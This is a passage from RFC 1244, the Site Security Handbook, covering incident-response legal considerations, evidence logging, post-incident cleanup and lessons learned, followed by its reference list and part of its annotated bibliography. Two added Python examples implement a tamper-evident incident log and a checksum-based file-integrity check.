may be sued if users at your site or elsewhere discover
that your site is monitoring account activity without
informing users.

Unfortunately, there are no clear precedents yet on the
liabilities or responsibilities of organizations involved in a
security incident or who might be involved in supporting an
investigative effort. Investigators will often encourage
organizations to help trace and monitor intruders — indeed, most
investigators cannot pursue computer intrusions without extensive
support from the organizations involved. However, investigators
cannot provide protection from liability claims, and these kinds
of efforts may drag out for months and may take lots of effort.

On the other side, an organization’s legal counsel may advise
extreme caution and suggest that tracing activities be halted and
an intruder shut out of the system. This in itself may not
provide protection from liability, and may prevent investigators
from identifying anyone.

The balance between supporting investigative activity and limiting
liability is tricky; you’ll need to consider the advice of your
counsel and the damage the intruder is causing (if any) in making
your decision about what to do during any particular incident.

Your legal counsel should also be involved in any decision to
contact investigative agencies when an incident occurs at your
site. The decision to coordinate efforts with investigative
agencies is most properly that of your site or organization.
Involving your legal counsel will also foster the multi-level
coordination between your site and the particular investigative
agency involved which in turn results in an efficient division of
labor. Another result is that you are likely to obtain guidance
that will help you avoid future legal mistakes.

Finally, your legal counsel should evaluate your site’s written
procedures for responding to incidents. It is essential to obtain
a “clean bill of health” from a legal perspective before you
actually carry out these procedures.

5.5.2 Formal and Informal Legal Procedures

One of the most important considerations in dealing with
investigative agencies is verifying that the person who calls
asking for information is a legitimate representative from the
agency in question. Unfortunately, many well intentioned people
have unknowingly leaked sensitive information about incidents,
allowed unauthorized people into their systems, etc., because a
caller has masqueraded as an FBI or Secret Service agent. A
similar consideration is using a secure means of communication.
Because many network attackers can easily reroute electronic mail,
avoid using electronic mail to communicate with other agencies (as
well as others dealing with the incident at hand). Non-secured
phone lines (e.g., the phones normally used in the business world)
are also frequent targets for tapping by network intruders, so be
careful!

There is no established set of rules for responding to an incident
when the U.S. Federal Government becomes involved. Except by
court order, no agency can force you to monitor, to disconnect
from the network, to avoid telephone contact with the suspected
attackers, etc. As discussed in section 5.5.1, you should
consult your legal counsel on the matter, especially before
taking an action that your organization has never taken. The
particular agency involved may ask you to leave an attacked
machine on and to monitor activity on this machine, for example.
Your complying with this request will ensure continued cooperation
of the agency–usually the best route towards finding the source
of the network attacks and, ultimately, terminating these attacks.
Additionally, you may need some information or a favor from the
agency involved in the incident. You are likely to get what you
need only if you have been cooperative. Of particular importance
is avoiding unnecessary or unauthorized disclosure of information
about the incident, including any information furnished by the
agency involved. The trust between your site and the agency
hinges upon your ability to avoid compromising the case the agency
will build; keeping “tight lipped” is imperative.

Sometimes your needs and the needs of an investigative agency will
differ. Your site may want to get back to normal business by
closing an attack route, but the investigative agency may want you
to keep this route open. Similarly, your site may want to close a
compromised system down to avoid the possibility of negative
publicity, but again the investigative agency may want you to
continue monitoring. When there is such a conflict, there may be
a complex set of tradeoffs (e.g., interests of your site’s
management, amount of resources you can devote to the problem,
jurisdictional boundaries, etc.). An important guiding principle
is related to what might be called “Internet citizenship” [22,
IAB89, 23] and its responsibilities. Your site can shut a system
down, and this will relieve you of the stress, resource demands,
and danger of negative exposure. The attacker, however, is likely
to simply move on to another system, temporarily leaving others
blind to the attacker’s intention and actions until another path
of attack can be detected. Providing that there is no damage to
your systems and others, the most responsible course of action is
to cooperate with the participating agency by leaving your
compromised system on. This will allow monitoring (and,
ultimately, the possibility of terminating the source of the
threat to systems just like yours). On the other hand, if there
is damage to computers illegally accessed through your system, the
choice is more complicated: shutting down the intruder may prevent
further damage to systems, but might make it impossible to track
down the intruder. If there has been damage, the decision about
whether it is important to leave systems up to catch the intruder
should involve all the organizations affected. Further
complicating the issue of network responsibility is the
consideration that if you do not cooperate with the agency
involved, you will be less likely to receive help from that agency
in the future.

5.6 Documentation Logs

When you respond to an incident, document all details related to the
incident. This will provide valuable information to yourself and
others as you try to unravel the course of events. Documenting all
details will ultimately save you time. If you don’t document every
relevant phone call, for example, you are likely to forget a good
portion of information you obtain, requiring you to contact the
source of information once again. This wastes your and others’
time, something you can ill afford. At the same time, recording
details will provide evidence for prosecution efforts, providing the
case moves in this direction. Documenting an incident also will help
you perform a final assessment of damage (something your management
as well as law enforcement officers will want to know), and will
provide the basis for a follow-up analysis in which you can engage in
a valuable “lessons learned” exercise.

During the initial stages of an incident, it is often infeasible to
determine whether prosecution is viable, so you should document as if
you are gathering evidence for a court case. At a minimum, you
should record:

o All system events (audit records).
o All actions you take (time tagged).
o All phone conversations (including the person with whom
you talked, the date and time, and the content of the
conversation).

The most straightforward way to maintain documentation is keeping a
log book. This allows you to go to a centralized, chronological
source of information when you need it, instead of requiring you to
page through individual sheets of paper. Much of this information is
potential evidence in a court of law. Thus, when you initially
suspect that an incident will result in prosecution or when an
investigative agency becomes involved, you need to regularly (e.g.,
every day) turn in photocopied, signed copies of your logbook (as
well as media you use to record system events) to a document
custodian who can store these copied pages in a secure place (e.g., a
safe). When you submit information for storage, you should in return
receive a signed, dated receipt from the document custodian. Failure
to observe these procedures can result in invalidation of any
evidence you obtain in a court of law.
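
The logging discipline above has a direct digital counterpart. The following Python example is added here and is not part of RFC 1244: it assumes an electronic log in place of the paper log book, chains each time-tagged entry to the previous one with SHA-256, and treats the custodian's receipt as a record of the chain head. The class, function and field names and all sample entries are constructed for illustration.

```python
import copy
import hashlib
import json

GENESIS = "0" * 64                    # value the first entry links back to
KINDS = {"event", "action", "phone"}  # the three record types listed in 5.6


def entry_digest(prev, entry):
    """SHA-256 over the previous digest plus a canonical form of the entry."""
    body = json.dumps(entry, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev + body).encode("utf-8")).hexdigest()


class IncidentLog:
    """Append-only, chronological log; every entry commits to its predecessor."""

    def __init__(self):
        self.records = []

    def head(self):
        return self.records[-1]["digest"] if self.records else GENESIS

    def append(self, when, author, kind, text):
        """Add one time-tagged entry and return its digest."""
        if kind not in KINDS:
            raise ValueError(f"unknown entry kind: {kind}")
        entry = {"when": when, "author": author, "kind": kind, "text": text}
        prev = self.head()
        self.records.append(
            {"entry": entry, "prev": prev, "digest": entry_digest(prev, entry)})
        return self.records[-1]["digest"]

    def receipt(self, custodian, when):
        """What the custodian signs and keeps: how many entries, ending where."""
        return {"custodian": custodian, "when": when,
                "count": len(self.records), "head": self.head()}


def verify(records, receipt=None):
    """Return a list of problems; an empty list means the log checks out."""
    problems = []
    prev = GENESIS
    for i, rec in enumerate(records):
        if rec["prev"] != prev:
            problems.append(f"entry {i}: link to previous entry is broken")
        if entry_digest(rec["prev"], rec["entry"]) != rec["digest"]:
            problems.append(f"entry {i}: content does not match its digest")
        prev = rec["digest"]
    if receipt is not None:
        n = receipt["count"]
        if len(records) < n:
            problems.append("log is shorter than the custodian's receipt")
        elif n and records[n - 1]["digest"] != receipt["head"]:
            problems.append("entries covered by the receipt were altered")
    return problems


def rechain(records):
    """Recompute every digest, as anyone with write access to the log could."""
    prev = GENESIS
    for rec in records:
        rec["prev"], rec["digest"] = prev, entry_digest(prev, rec["entry"])
        prev = rec["digest"]


def demo():
    """Constructed entries: one day's log, a receipt, then three alterations."""
    log = IncidentLog()
    log.append("1991-07-01T09:12:00Z", "operator-a", "event",
               "constructed: audit record shows login from unknown host")
    log.append("1991-07-01T09:20:00Z", "operator-a", "action",
               "constructed: disabled remote file transfer")
    log.append("1991-07-01T09:45:00Z", "operator-a", "phone",
               "constructed: called point of contact, agreed to keep monitoring")
    receipt = log.receipt("document custodian", "1991-07-01T17:00:00Z")
    log.append("1991-07-02T08:30:00Z", "operator-a", "action",
               "constructed: restored service in limited stages")

    edited = copy.deepcopy(log.records)
    edited[1]["entry"]["when"] = "1991-07-01T08:00:00Z"   # back-dated action
    rewritten = copy.deepcopy(edited)
    rechain(rewritten)                                    # cover the edit
    return {
        "intact": verify(log.records, receipt),
        "edited": verify(edited),
        "rewritten_no_receipt": verify(rewritten),
        "rewritten_with_receipt": verify(rewritten, receipt),
        "truncated": verify(log.records[:2], receipt),
    }


if __name__ == "__main__":
    for case, problems in demo().items():
        print(f"{case:24} {problems or 'ok'}")
```

The receipt is what defeats a full rewrite: anyone who can write to the log can recompute the chain, so the head digest has to be held by someone else.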

6. Establishing Post-Incident Procedures

6.1 Overview

In the wake of an incident, several actions should take place. These
actions can be summarized as follows:

1. An inventory should be taken of the systems’ assets,
i.e., a careful examination should determine how the
system was affected by the incident,

2. The lessons learned as a result of the incident
should be included in a revised security plan to
prevent the incident from re-occurring,

3. A new risk analysis should be developed in light of the
incident,

4. An investigation and prosecution of the individuals
who caused the incident should commence, if it is
deemed desirable.

All four steps should provide feedback to the site security policy
committee, leading to prompt re-evaluation and amendment of the
current policy.

6.2 Removing Vulnerabilities

Removing all vulnerabilities once an incident has occurred is
difficult. The key to removing vulnerabilities is knowledge and
understanding of the breach. In some cases, it is prudent to remove
all access or functionality as soon as possible, and then restore
normal operation in limited stages. Bear in mind that removing all
access while an incident is in progress will obviously notify all
users, including the alleged problem users, that the administrators
are aware of a problem; this may have a deleterious effect on an
investigation. However, allowing an incident to continue may also
open the likelihood of greater damage, loss, aggravation, or
liability (civil or criminal).

If it is determined that the breach occurred due to a flaw in the
systems’ hardware or software, the vendor (or supplier) and the CERT
should be notified as soon as possible. Including relevant telephone
numbers (also electronic mail addresses and fax numbers) in the site
security policy is strongly recommended. To aid prompt
acknowledgment and understanding of the problem, the flaw should be
described in as much detail as possible, including details about how
to exploit the flaw.

As soon as the breach has occurred, the entire system and all its
components should be considered suspect. System software is the most
probable target. Preparation is key to recovering from a possibly
tainted system. This includes checksumming all tapes from the vendor
using a checksum algorithm which (hopefully) is resistant to
tampering [10]. (See sections 3.9.4.1, 3.9.4.2.) Assuming original
vendor distribution tapes are available, an analysis of all system
files should commence, and any irregularities should be noted and
referred to all parties involved in handling the incident. It can be
very difficult, in some cases, to decide which backup tapes to
recover from; consider that the incident may have continued for
months or years before discovery, and that the suspect may be an
employee of the site, or otherwise have intimate knowledge or access
to the systems. In all cases, the pre-incident preparation will
determine what recovery is possible. In the worst case, restoration from
the original manufacturers’ media and a re-installation of the systems
will be the most prudent solution.

Review the lessons learned from the incident and always update the
policy and procedures to reflect changes necessitated by the
incident.

6.2.1 Assessing Damage

Before cleanup can begin, the actual system damage must be
discerned. This can be quite time consuming, but should lead to
some insight into the nature of the incident, and aid
investigation and prosecution. It is best to compare previous
backups or original tapes when possible; advance preparation is
the key. If the system supports centralized logging (most do), go
back over the logs and look for abnormalities. If process
accounting and connect time accounting are enabled, look for
patterns of system usage. To a lesser extent, disk usage may shed
light on the incident. Accounting can provide much helpful
information in an analysis of an incident and subsequent
prosecution.

6.2.2 Cleanup

Once the damage has been assessed, it is necessary to develop a
plan for system cleanup. In general, bringing up services in the
order of demand to allow a minimum of user inconvenience is the
best practice. Understand that the proper recovery procedures for
the system are extremely important and should be specific to the
site.

It may be necessary to go back to the original distributed tapes
and recustomize the system. To facilitate this worst case
scenario, a record of the original systems setup and each
customization change should be kept current with each change to
the system.

6.2.3 Follow up

Once you believe that a system has been restored to a “safe”
state, it is still possible that holes and even traps could be
lurking in the system. In the follow-up stage, the system should
be monitored for items that may have been missed during the
cleanup stage. It would be prudent to utilize some of the tools
mentioned in section 3.9.8.2 (e.g., COPS) as a start. Remember,
these tools don’t replace continual system monitoring and good
systems administration procedures.

6.2.4 Keep a Security Log

As discussed in section 5.6, a security log can be most valuable
during this phase of removing vulnerabilities. There are two
considerations here; the first is to keep logs of the procedures
that have been used to make the system secure again. This should
include command procedures (e.g., shell scripts) that can be run
on a periodic basis to recheck the security. Second, keep logs of
important system events. These can be referenced when trying to
determine the extent of the damage of a given incident.
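
The checksum comparison of system files described in section 6.2 and the periodically re-run check of section 6.2.4, as an added example that is not part of RFC 1244. It uses SHA-256 from Python's standard library in place of the one-way hash cited in [10]; the function names, report categories and sample tree are constructed for illustration.

```python
import hashlib
import os
import stat
import tempfile

SETID = stat.S_ISUID | stat.S_ISGID


def file_record(path):
    """Describe one file without following symlinks."""
    st = os.lstat(path)
    rec = {"mode": stat.S_IMODE(st.st_mode), "type": "other", "sha256": None}
    if stat.S_ISLNK(st.st_mode):
        # Hash the link target: a redirected link is as bad as a changed file.
        rec["type"] = "symlink"
        rec["sha256"] = hashlib.sha256(os.fsencode(os.readlink(path))).hexdigest()
    elif stat.S_ISREG(st.st_mode):
        rec["type"] = "file"
        digest = hashlib.sha256()
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                digest.update(chunk)
        rec["sha256"] = digest.hexdigest()
    return rec


def build_manifest(root):
    """Map each path under root (relative, '/'-separated) to its record."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        # os.walk does not descend into symlinked directories; record the link.
        links = [d for d in dirnames if os.path.islink(os.path.join(dirpath, d))]
        for name in filenames + links:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = file_record(full)
    return manifest


def compare(baseline, current):
    """Return the irregularities between a trusted baseline and the live tree."""
    report = {"missing": [], "added": [], "modified": [],
              "mode_changed": [], "new_setid": []}
    for path in sorted(set(baseline) | set(current)):
        old, new = baseline.get(path), current.get(path)
        if new is None:
            report["missing"].append(path)
            continue
        if old is None:
            report["added"].append(path)
        else:
            if (old["type"], old["sha256"]) != (new["type"], new["sha256"]):
                report["modified"].append(path)
            if old["mode"] != new["mode"]:
                report["mode_changed"].append(path)
        # A set-uid/set-gid bit the baseline did not have gets its own flag.
        old_mode = old["mode"] if old else 0
        if new["type"] == "file" and new["mode"] & SETID & ~old_mode:
            report["new_setid"].append(path)
    return report


def demo():
    """Constructed tree: take a baseline, make four changes, compare."""
    with tempfile.TemporaryDirectory() as root:
        files = {"bin/login": b"login v1 constructed\n",
                 "bin/ls": b"ls v1 constructed\n",
                 "etc/inetd.conf": b"# constructed sample\n"}
        for rel, data in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
            os.chmod(full, 0o755)
        baseline = build_manifest(root)   # in practice: taken before any incident

        # Same length as the original, so a size check alone would miss it.
        with open(os.path.join(root, "bin/login"), "wb") as fh:
            fh.write(b"login v1 c0nstructed\n")
        os.chmod(os.path.join(root, "bin/ls"), 0o4755)
        os.remove(os.path.join(root, "etc/inetd.conf"))
        with open(os.path.join(root, "bin/.hidden"), "wb") as fh:
            fh.write(b"constructed\n")
        return compare(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:13} {paths}")
```

Keep the baseline manifest on read-only or offline media, as with the vendor tapes: a manifest stored on the suspect system is itself suspect.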

6.3 Capturing Lessons Learned

6.3.1 Understand the Lesson

After an incident, it is prudent to write a report describing the
incident, method of discovery, correction procedure, monitoring
procedure, and a summary of lessons learned. This will aid in the
clear understanding of the problem. Remember, it is difficult to
learn from an incident if you don’t understand the source.

6.3.2 Resources

6.3.2.1 Other Security Devices, Methods

Security is a dynamic, not static, process. Sites are dependent
on the nature of security available at each site, and the array
of devices and methods that will help promote security.
Keeping up with the security area of the computer industry and
its methods will assure a security manager of taking
advantage of the latest technology.

6.3.2.2 Repository of Books, Lists, Information Sources

Keep an on site collection of books, lists, information
sources, etc., as guides and references for securing the
system. Keep this collection up to date. Remember, as systems
change, so do security methods and problems.

6.3.2.3 Form a Subgroup

Form a subgroup of system administration personnel that will be
the core security staff. This will allow discussions of
security problems and multiple views of the site’s security
issues. This subgroup can also act to develop the site
security policy and make suggested changes as necessary to
ensure site security.

6.4 Upgrading Policies and Procedures

6.4.1 Establish Mechanisms for Updating Policies, Procedures,
and Tools

If an incident is based on poor policy, then unless the policy is
changed, one is doomed to repeat the past. Once a site has
recovered from an incident, site policy and procedures should be
reviewed to encompass changes to prevent similar incidents. Even
without an incident, it would be prudent to review policies and
procedures on a regular basis. Reviews are imperative due to
today’s changing computing environments.

6.4.2 Problem Reporting Procedures

A problem reporting procedure should be implemented to describe,
in detail, the incident and the solutions to the incident. Each
incident should be reviewed by the site security subgroup to allow
understanding of the incident with possible suggestions to the
site policy and procedures.

7. References

[1] Quarterman, J., “The Matrix: Computer Networks and Conferencing
Systems Worldwide”, Pg. 278, Digital Press, Bedford, MA, 1990.

[2] Brand, R., “Coping with the Threat of Computer Security
Incidents: A Primer from Prevention through Recovery”, R. Brand,
available on-line from: cert.sei.cmu.edu:/pub/info/primer, 8 June
1990.

[3] Fites, M., Kratz, P. and A. Brebner, “Control and Security of
Computer Information Systems”, Computer Science Press, 1989.

[4] Johnson, D., and J. Podesta, “Formulating a Company Policy on
Access to and Use and Disclosure of Electronic Mail on Company
Computer Systems”, Available from: The Electronic Mail
Association (EMA) 1555 Wilson Blvd, Suite 555, Arlington VA
22209, (703) 522-7111, 22 October 1990.

[5] Curry, D., “Improving the Security of Your UNIX System”, SRI
International Report ITSTD-721-FR-90-21, April 1990.

[6] Cheswick, B., “The Design of a Secure Internet Gateway”,
Proceedings of the Summer Usenix Conference, Anaheim, CA, June
1990.

[7] Linn, J., “Privacy Enhancement for Internet Electronic Mail: Part
I — Message Encipherment and Authentication Procedures”, RFC
1113, IAB Privacy Task Force, August 1989.

[8] Kent, S., and J. Linn, “Privacy Enhancement for Internet
Electronic Mail: Part II — Certificate-Based Key Management”,
RFC 1114, IAB Privacy Task Force, August 1989.

[9] Linn, J., “Privacy Enhancement for Internet Electronic Mail: Part
III — Algorithms, Modes, and Identifiers”, RFC 1115, IAB Privacy
Task Force, August 1989.

[10] Merkle, R., “A Fast Software One Way Hash Function”, Journal of
Cryptology, Vol. 3, No. 1.

[11] Postel, J., “Internet Protocol – DARPA Internet Program Protocol
Specification”, RFC 791, DARPA, September 1981.

[12] Postel, J., “Transmission Control Protocol – DARPA Internet
Program Protocol Specification”, RFC 793, DARPA, September 1981.

[13] Postel, J., “User Datagram Protocol”, RFC 768, USC/Information
Sciences Institute, 28 August 1980.

[14] Mogul, J., “Simple and Flexible Datagram Access Controls for
UNIX-based Gateways”, Digital Western Research Laboratory
Research Report 89/4, March 1989.

[15] Bellovin, S., and M. Merritt, “Limitations of the Kerberos
Authentication System”, Computer Communications Review, October
1990.

[16] Pfleeger, C., “Security in Computing”, Prentice-Hall, Englewood
Cliffs, N.J., 1989.

[17] Parker, D., Swope, S., and B. Baker, “Ethical Conflicts:
Information and Computer Science, Technology and Business”, QED
Information Sciences, Inc., Wellesley, MA.

[18] Forester, T., and P. Morrison, “Computer Ethics: Tales and
Ethical Dilemmas in Computing”, MIT Press, Cambridge, MA, 1990.

[19] Postel, J., and J. Reynolds, “Telnet Protocol Specification”, RFC
854, USC/Information Sciences Institute, May 1983.

[20] Postel, J., and J. Reynolds, “File Transfer Protocol”, RFC 959,
USC/Information Sciences Institute, October 1985.

[21] Postel, J., Editor, “IAB Official Protocol Standards”, RFC 1200,
IAB, April 1991.

[22] Internet Activities Board, “Ethics and the Internet”, RFC 1087,
Internet Activities Board, January 1989.

[23] Pethia, R., Crocker, S., and B. Fraser, “Policy Guidelines for
the Secure Operation of the Internet”, CERT, TIS, CERT, RFC in
preparation.

[24] Computer Emergency Response Team (CERT/CC), “Unauthorized
Password Change Requests”, CERT Advisory CA-91:03, April 1991.

[25] Computer Emergency Response Team (CERT/CC), “TELNET Breakin
Warning”, CERT Advisory CA-89:03, August 1989.

[26] CCITT, Recommendation X.509, “The Directory: Authentication
Framework”, Annex C.

[27] Farmer, D., and E. Spafford, “The COPS Security Checker System”,
Proceedings of the Summer 1990 USENIX Conference, Anaheim, CA,
Pgs. 165-170, June 1990.

8. Annotated Bibliography

The intent of this annotated bibliography is to offer a
representative collection of resources of information that will help
the user of this handbook. It is meant to provide a starting point for
further research in the security area. Included are references to
other sources of information for those who wish to pursue issues of
the computer security environment.

8.1 Computer Law

[ABA89]
American Bar Association, Section of Science and
Technology, “Guide to the Prosecution of Telecommunication
Fraud by the Use of Computer Crime Statutes”, American Bar
Association, 1989.

[BENDER]
Bender, D., “Computer Law: Evidence and Procedure”,
M. Bender, New York, NY, 1978-present.

Kept up to date with supplements.
The years 1978-1984 focus on computer law,
evidence and procedures. The years 1984 to the present
focus on general computer law. Bibliographical
references and index included.

[BLOOMBECKER]
Bloombecker, B., “Spectacular Computer Crimes”, Dow Jones-
Irwin, Homewood, IL. 1990.

[CCH]
Commerce Clearing House, “Guide to Computer Law”, (Topical
Law Reports), Chicago, IL., 1989.

Court cases and decisions rendered by federal and state
courts throughout the United States on federal and state
computer law. Includes Case Table and Topical Index.

[CONLY]
Conly, C., “Organizing for Computer Crime Investigation and
Prosecution”, U.S. Dept. of Justice, Office of Justice
Programs, Under Contract Number OJP-86-C-002, National
Institute of Justice, Washington, DC, July 1989.

[FENWICK]
Fenwick, W., Chair, “Computer Litigation, 1985: Trial
Tactics and Techniques”, Litigation Course Handbook
Series No. 280, Prepared for distribution at the
Computer Litigation, 1985: Trial Tactics and
Techniques Program, February-March 1985.

[GEMIGNANI]
Gemignani, M., “Viruses and Criminal Law”, Communications
of the ACM, Vol. 32, No. 6, Pgs. 669-671, June 1989.

[HUBAND]
Huband, F., and R. Shelton, Editors, “Protection of
Computer Systems and Software: New Approaches for Combating
Theft of Software and Unauthorized Intrusion”, Papers
presented at a workshop sponsored by the National Science
Foundation, 1986.

[MCEWEN]
McEwen, J., “Dedicated Computer Crime Units”, Report
Contributors: D. Fester and H. Nugent, Prepared for the
National Institute of Justice, U.S. Department of Justice,
by Institute for Law and Justice, Inc., under contract number
OJP-85-C-006, Washington, DC, 1989.

[PARKER]
Parker, D., “Computer Crime: Criminal Justice Resource
Manual”, U.S. Dept. of Justice, National Institute of Justice,
Office of Justice Programs, Under Contract Number
OJP-86-C-002, Washington, D.C., August 1989.

[SHAW]
Shaw, E., Jr., “Computer Fraud and Abuse Act of 1986”,
Congressional Record (3 June 1986), Washington, D.C.,
3 June 1986.

[TRIBLE]
Trible, P., “The Computer Fraud and Abuse Act of 1986”,
U.S. Senate Committee on the Judiciary, 1986.

8.2 Computer Security

[CAELLI]
Caelli, W., Editor, “Computer Security in the Age of
Information”, Proceedings of the Fifth IFIP International
Conference on Computer Security, IFIP/Sec ’88.

[CARROLL]
Carroll, J., “Computer Security”, 2nd Edition, Butterworth
Publishers, Stoneham, MA, 1987.

[COOPER]
Cooper, J., “Computer and Communications Security:
Strategies for the 1990s”, McGraw-Hill, 1989.

[BRAND]
Brand, R., “Coping with the Threat of Computer Security
Incidents: A Primer from Prevention through Recovery”,
R. Brand, 8 June 1990.

As computer security becomes a more important issue in
modern society, it begins to warrant a systematic approach.
The vast majority of the computer security problems and the
costs associated with them can be prevented with simple
inexpensive measures. The most important and cost
effective of these measures are available in the prevention
and planning phases. These methods are presented in this
paper, followed by a simplified guide to incident
handling and recovery. Available on-line from:
cert.sei.cmu.edu:/pub/info/primer.

[CHESWICK]
Cheswick, B., “The Design of a Secure Internet Gateway”,
Proceedings of the Summer Usenix Conference, Anaheim, CA,
June 1990.

Brief abstract (slight paraphrase from the original
abstract): AT&T maintains a large internal Internet that
needs to be protected from outside attacks, while
providing useful services between the two.
This paper describes AT&T’s Internet gateway. This
gateway passes mail and many of the common Internet
services between AT&T internal machines and the Internet.
This is accomplished without IP connectivity using a pair
of machines: a trusted internal machine and an untrusted
external gateway. These are connected by a private link.
The internal machine provides a few carefully-guarded
services to the external gateway. This configuration
helps protect the internal internet even if the external
machine is fully compromised.

This is a very useful and interesting design. Most
firewall gateway systems rely on a system that, if
compromised, could allow access to the machines behind
the firewall. Also, most firewall systems require users
who want access to Internet services to have accounts on
the firewall machine. AT&T’s design allows AT&T internal
internet users access to the standard services of TELNET and
FTP from their own workstations without accounts on
the firewall machine. A very useful paper that shows
how to maintain some of the benefits of Internet
connectivity while still maintaining strong
security.

[CURRY]
Curry, D., “Improving the Security of Your UNIX System”,
SRI International Report ITSTD-721-FR-90-21, April 1990.

This paper describes measures that you, as a system
administrator, can take to make your UNIX system(s) more
secure. Oriented primarily at SunOS 4.x, most of the
information covered applies equally well to any Berkeley
UNIX system with or without NFS and/or Yellow Pages (NIS).
Some of the information can also be applied to System V,
although this is not a primary focus of the paper. A very
useful reference, this is also available on the Internet in
various locations, including the directory
cert.sei.cmu.edu:/pub/info.

[FITES]
Fites, M., Kratz, P. and A. Brebner, “Control and
Security of Computer Information Systems”, Computer Science
Press, 1989.

This book serves as a good guide to the issues encountered
in forming computer security policies and procedures. The
book is designed as a textbook for an introductory course
in information systems security.

The book is divided into five sections: Risk Management (I),
Safeguards: security and control measures, organizational
and administrative (II), Safeguards: Security and Control
Measures, Technical (III), Legal Environment and
Professionalism (IV), and CICA Computer Control Guidelines
(V).

The book is particularly notable for its straight-forward
approach to security, emphasizing that common sense is the
first consideration in designing a security program. The
authors note that there is a tendency to look to more
technical solutions to security problems while overlooking
organizational controls which are often cheaper and much
more effective. 298 pages, including references and index.

[GARFINKEL]
Garfinkel, S., and E. Spafford, “Practical Unix Security”,
O’Reilly & Associates, ISBN 0-937175-72-2, May 1991.

Approx 450 pages, $29.95. Orders: 1-800-338-6887
(US & Canada), 1-707-829-0515 (Europe), email: nuts@ora.com

This is one of the most useful books available on Unix
security. The first part of the book covers standard Unix
and Unix security basics, with particular emphasis on
passwords. The second section covers enforcing security on
the system. Of particular interest to the Internet user are
the sections on network security, which address many
of the common security problems that afflict Internet Unix
users. Four chapters deal with handling security incidents,
and the book concludes with discussions of encryption,
physical security, and useful checklists and lists of
resources. The book lives up to its name; it is filled with
specific references to possible security holes, files to
check, and things to do to improve security. This
book is an excellent complement to this handbook.

[GREENIA90]
Greenia, M., “Computer Security Information Sourcebook”,
Lexikon Services, Sacramento, CA, 1989.

A manager’s guide to computer security. Contains a
sourcebook of key reference materials including
access control and computer crimes bibliographies.

[HOFFMAN]
Hoffman, L., “Rogue Programs: Viruses, Worms, and
Trojan Horses”, Van Nostrand Reinhold, NY, 1990.
(384 pages, includes bibliographical references and index.)

[JOHNSON]
Johnson, D., and J. Podesta, “Formulating A Company Policy
on Access to and Use and Disclosure of Electronic Mail on
Company Computer Systems”.

A white paper prepared for the EMA, written by two experts
in privacy law. Gives background on the issues, and presents
some policy options.

Available from: The Electronic Mail Association (EMA)
1555 Wilson Blvd, Suite 555, Arlington, VA, 22209.
(703) 522-7111.

[KENT]
Kent, Stephen, “E-Mail Privacy for the Internet: New Software
and Strict Registration Procedures will be Implemented this
Year”, Business Communications Review, Vol. 20, No. 1,
Pg. 55, 1 January 1990.

[LU]
Lu, W., and M. Sundareshan, “Secure Communication in
Internet Environments: A Hierarchical Key Management Scheme
for End-to-End Encryption”, IEEE Transactions on
Communications, Vol. 37, No. 10, Pg. 1014, 1 October 1989.

[LU1]
Lu, W., and M. Sundareshan, “A Model for Multilevel Security
in Computer Networks”, IEEE Transactions on Software
Engineering, Vol. 16, No. 6, Page 647, 1 June 1990.

[NSA]
National Security Agency, “Information Systems Security
Products and Services Catalog”, NSA, Quarterly Publication.

NSA’s catalogue contains chapters on: Endorsed Cryptographic
Products List; NSA Endorsed Data Encryption Standard (DES)
Products List; Protected Services List; Evaluated Products
List; Preferred Products List; and Endorsed Tools List.

The catalogue is available from the Superintendent of
Documents, U.S. Government Printing Office, Washington,
D.C. One may place telephone orders by calling:
(202) 783-3238.

[OTA]
United States Congress, Office of Technology Assessment,
“Defending Secrets, Sharing Data: New Locks and Keys for
Electronic Information”, OTA-CIT-310, October 1987.

This report, prepared for a congressional committee considering
Federal policy on the protection of electronic information, is
interesting because of the issues it raises regarding the
impact of technology used to protect information. It also
serves as a reasonable introduction to the various encryption
and information protection mechanisms. 185 pages. Available
from the U.S. Government Printing Office.

[PALMER]
Palmer, I., and G. Potter, “Computer Security Risk
Management”, Van Nostrand Reinhold, NY, 1989.

[PFLEEGER]
Pfleeger, C., “Security in Computing”, Prentice-Hall,
Englewood Cliffs, NJ, 1989.

A general textbook in computer security, this book provides an
excellent and very readable introduction to classic computer
security problems and solutions, with a particular emphasis on
encryption. The encryption coverage serves as a good
introduction to the subject. Other topics covered include
building secure programs and systems, security of databases,
personal computer security, network and communications
security, physical security, risk analysis and security
planning, and legal and ethical issues. 538 pages including
index and bibliography.

[SHIREY]
Shirey, R., “Defense Data Network Security Architecture”,
Computer Communication Review, Vol. 20, No. 2, Page 66,
1 April 1990.

[SPAFFORD]
Spafford, E., Heaphy, K., and D. Ferbrache, “Computer
Viruses: Dealing with Electronic Vandalism and Programmed
Threats”, ADAPSO, 1989. (109 pages.)

This is a good general reference on computer viruses and
related concerns. In addition to describing viruses in
some detail, it also covers more general security issues,
legal recourse in case of security problems, and includes
lists of laws, journals focused on computer security,
and other security-related resources.

Available from: ADAPSO, 1300 N. 17th St, Suite 300,
Arlington VA 22209. (703) 522-5055.

[STOLL88]
Stoll, C., “Stalking the Wily Hacker”, Communications
of the ACM, Vol. 31, No. 5, Pgs. 484-497, ACM,
New York, NY, May 1988.

This article describes some of the technical means used
to trace the intruder that was later chronicled in
“Cuckoo’s Egg” (see below).

[STOLL89]
Stoll, C., “The Cuckoo’s Egg”, ISBN 00385-24946-2,
Doubleday, 1989.

Clifford Stoll, an astronomer turned UNIX System
Administrator, recounts an exciting, true story of how he
tracked a computer intruder through the maze of American
military and research networks. This book is easy to
understand and can serve as an interesting introduction to
the world of networking. Jon Postel says in a book review,
“[this book] … is absolutely essential reading for anyone
that uses or operates any computer connected to the Internet
or any other computer network.”

[VALLA]
Vallabhaneni, S., “Auditing Computer Security: A Manual with
Case Studies”, Wiley, New York, NY, 1989.

8.3 Ethics

[CPSR89]
Computer Professionals for Social Responsibility, “CPSR
Statement on the Computer Virus”, CPSR, Communications of the
ACM, Vol. 32, No. 6, Pg. 699, June 1989.

This memo is a statement on the Internet Computer Virus
by the Computer Professionals for Social Responsibility
(CPSR).

[DENNING]
Denning, Peter J., Editor, “Computers Under Attack:
Intruders, Worms, and Viruses”, ACM Press, 1990.

